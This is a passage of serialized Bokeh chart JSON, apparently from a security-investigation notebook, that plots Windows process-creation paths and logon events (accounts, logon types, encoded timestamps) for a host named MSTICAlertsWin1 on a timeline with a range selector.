State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"3382\"},\"selection_policy\":{\"id\":\"3383\"}},\"id\":\"3287\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"3403\",\"type\":\"DaysTicker\"},{\"attributes\":{\"end\":1547531197777.0,\"start\":1547515216573.0},\"id\":\"3293\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"3404\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"3323\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3406\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3287\"},\"glyph\":{\"id\":\"3342\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3343\"},\"view\":{\"id\":\"3345\"}},\"id\":\"3344\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"3386\"},{\"id\":\"3387\"},{\"id\":\"3388\"},{\"id\":\"3389\"},{\"id\":\"3390\"},{\"id\":\"3391\"},{\"id\":\"3392\"},{\"id\":\"3393\"},{\"id\":\"3394\"},{\"id\":\"3395\"},{\"id\":\"3396\"},{\"id\":\"3397\"}]},\"id\":\"3302\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"below\":[{\"id\":\"3333\"},{\"id\":\"3338\"}],\"center\":[{\"id\":\"3336\"}],\"height\":120,\"renderers\":[{\"id\":\"3344\"},{\"id\":\"3349\"}],\"title\":{\"id\":\"3323\"},\"toolbar\":{\"id\":\"3337\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"3325\"},\"x_scale\":{\"id\":\"3329\"},\"y_range\":{\"id\":\"3327\"},\"y_scale\":{\"id\":\"3331\"}},\"id\":\"3322\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"3299\",\"type\":\"LinearScale\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\adm1nistrator\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[4,5,3,5,5,4,5,5,5,5,5,5,5,5],\"TargetLogonId\":[\"0xfaac27\",\"0x3e7\",\"0xfb5ee6\",\"0x3e7\",\"0x3e7\",\"0xf0c9d6\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAcJvz/oR2QgCwD/T+hHZCANAl9f6EdkIAUAn2/oR2QgAgHEr8hHZCABCzePiEdkIAUEV5+IR2QgAQTWn2hHZCAPDeafaEdkIAQE/J8oR2QgCgGfTyhHZCAJDayPeEdkIAsG3J94R2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"3384\"},\"selection_policy\":{\"id\":\"3385\"}},\"id\":\"3288\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"overlay\":{\"id\":\"3314\"}},\"id\":\"3310\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"3338\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3407\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3313\",\"type\":\"PanTool\"},{\"attributes\":{},\"id\":\"3376\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"3329\",\"type\":\"LinearScale\"},{\"attributes\":{\"end\":1547531863660.5,\"start\":1547514550689.5},\"id\":\"3325\",\"type\":\"Range1d\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"3369\"},{\"id\":\"3363\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"3370\",\"type\":\"Legend\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"3314\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"active_multi\":{\"id\":\"3351\"},\"tools\":[{\"id\":\"3351\"}]},\"id\":\"3337\",\"type\":\"Toolbar\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"3289\"},{\"id\":\"3309\"},{\"id\":\"3310\"},{\"id\":\"3311\"},{\"id\":\"3312\"},{\"id\":\"3313\"}]},\"id\":\"3315\",\"type\":\"Toolbar\"},{\"attributes\":{\"formatter\":{\"id\":\"3339\"},\"major_label_policy\":{\"id\":\"3379\"},\"ticker\":{\"id\":\"3334\"}},\"id\":\"3333\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"3383\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"source\":{\"id\":\"3287\"}},\"id\":\"3345\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3348\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"3382\",\"type\":\"Selection\"},{\"attributes\":{\"data_source\":{\"id\":\"3288\"},\"glyph\":{\"id\":\"3365\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3366\"},\"view\":{\"id\":\"3368\"}},\"id\":\"3367\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3365\",\"type\":\"Scatter\"},{\"attributes\":{\"axis\":{\"id\":\"3333\"},\"ticker\":null},\"id\":\"3336\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"3374\",\"type\":\"AllLabels\"},{\"attributes\":{\"source\":{\"id\":\"3287\"}},\"id\":\"3362\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3384\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\